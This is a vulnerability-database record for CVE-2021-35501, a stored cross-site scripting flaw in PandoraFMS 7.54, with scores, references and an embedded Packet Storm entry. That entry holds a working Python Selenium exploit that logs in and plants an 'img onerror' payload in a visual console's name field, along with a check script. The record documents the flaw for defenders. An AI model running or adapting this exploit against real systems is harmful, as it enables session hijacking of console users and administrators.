ID AKB:64B1C754-763D-4EF4-95D4-31D3E479C599Type attackerkbReporter AttackerKBModified 2021-07-02T00:00:00
Description
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.
Recent assessments:
nu11secur1ty at July 12, 2021 8:57am UTC reported:
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.
Reproduce:
Stored XSS
Proof:
<https://streamable.com/yjr0fm>
PHPSESSID PWNED
<https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html>
Assessed Attacker Value: 3
{"id": "AKB:64B1C754-763D-4EF4-95D4-31D3E479C599", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-35501", "description": "PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.\n\n \n**Recent assessments:** \n \n**nu11secur1ty** at July 12, 2021 8:57am UTC reported:\n\nPandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.\n\n# Reproduce:\n\n * * Stored XSS \n<https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-35501>\n\n# Proof:\n\n<https://streamable.com/yjr0fm>\n\n# PHPSESSID PWNED\n\n<https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html> \n<https://streamable.com/b7xt4g>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "published": "2021-06-25T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://attackerkb.com/topics/2JX8a4WkkC/cve-2021-35501", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35501", "https://k4m1ll0.com/cve-pandorafms754-chained-xss-rce.html", "http://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-35501"], "immutableFields": [], "lastseen": "2021-07-24T19:44:10", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-35501"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163466"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-35501"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163466"]}]}, "exploitation": null, "vulnersScore": 5.7}, "attackerkb": {"attackerValue": 3, "exploitability": 4}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35501"], "Miscellaneous": ["https://k4m1ll0.com/cve-pandorafms754-chained-xss-rce.html", "http://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html"]}, "tags": ["common_enterprise", "difficult_to_patch", "default_configuration", "requires_interaction"], "mitre_vector": {"Execution": ["Command and Scripting Interpreter: Python(Validated)", "Command and Scripting Interpreter: JavaScript/JScript(Validated)"]}, "last_activity": "2021-07-12T08:57:00", "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "edition": 2, "scheme": null, "_state": {"wildexploited": 1647356732, "dependencies": 1646226602}, "_internal": {"wildexploited_cvelist": null}}
{"packetstorm": [{"lastseen": "2021-07-13T16:14:01", "description": "", "published": "2021-07-12T00:00:00", "type": "packetstorm", "title": "Pandora FMS 7.54 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-35501"], "modified": "2021-07-12T00:00:00", "id": "PACKETSTORM:163466", "href": "https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: XSS vulnerability for (keywords) searching parameter in pandorafms-754/pandora_console/ visual console \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 07.12.2021 \n# Vendor: https://pandorafms.com/ \n# Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/754/PandoraFMS7.0NG.754.x86_64.iso/download \n# CVE: CVE-2021-35501 \n# Proof: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif \n \n[+] Exploit Source: \n \n### Exploit \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-35501 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://pandorafms.com/ \nwebsite_link=\"http://192.168.1.7/pandora_console/index.php\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"nick\" \n \n#enter the element for password input field \nelement_for_password=\"pass\" \n \n#enter the element for submit button \nelement_for_submit=\"login_button\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \n \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \n \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit Pandora FMS 755 \n# Payload \nbrowser.get((\" \nhttp://192.168.1.7/pandora_console/index.php?sec=network&sec2=godmode/reporting/visual_console_builder \n\")) \n \ntime.sleep(1) \n \n### Inner text... \nbrowser.execute_script(\"document.querySelector('[name=\\\"name\\\"]').value = \n'<img src=1 onerror=alert(`Please_fix_it`)>'\") \ninput(\"Select Application from Group and Press Enter to continue...\") \nbrowser.execute_script(\"document.querySelector('[name=\\\"update_layout\\\"]').click()\") \ntime.sleep(3) \nos.system(\"python check_PoC.py\") \nbrowser.close() \n \nprint(\"The payload is deployed, your visual console is PWNED...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, but something is not ok\") \n \n \n### Check \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-35501 \n \nfrom selenium import webdriver \nimport time \n \n# Vendor: https://pandorafms.com/ \nwebsite_link=\" \nhttp://192.168.1.7/pandora_console/index.php?sec=network&sec2=godmode/reporting/map_builder \n\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"nick\" \n \n#enter the element for password input field \nelement_for_password=\"pass\" \n \n#enter the element for submit button \nelement_for_submit=\"login_button\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \n \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \n \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, but something is not ok\") \n \n \n`\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163466/pandorafms754-xss.txt"}], "cve": [{"lastseen": "2022-03-23T18:49:13", "description": "PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-25T16:15:00", "type": "cve", "title": "CVE-2021-35501", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35501"], "modified": "2021-09-14T14:36:00", "cpe": ["cpe:/a:pandorafms:pandora_fms:754"], "id": "CVE-2021-35501", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35501", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:pandorafms:pandora_fms:754:*:*:*:*:*:*:*"]}]}
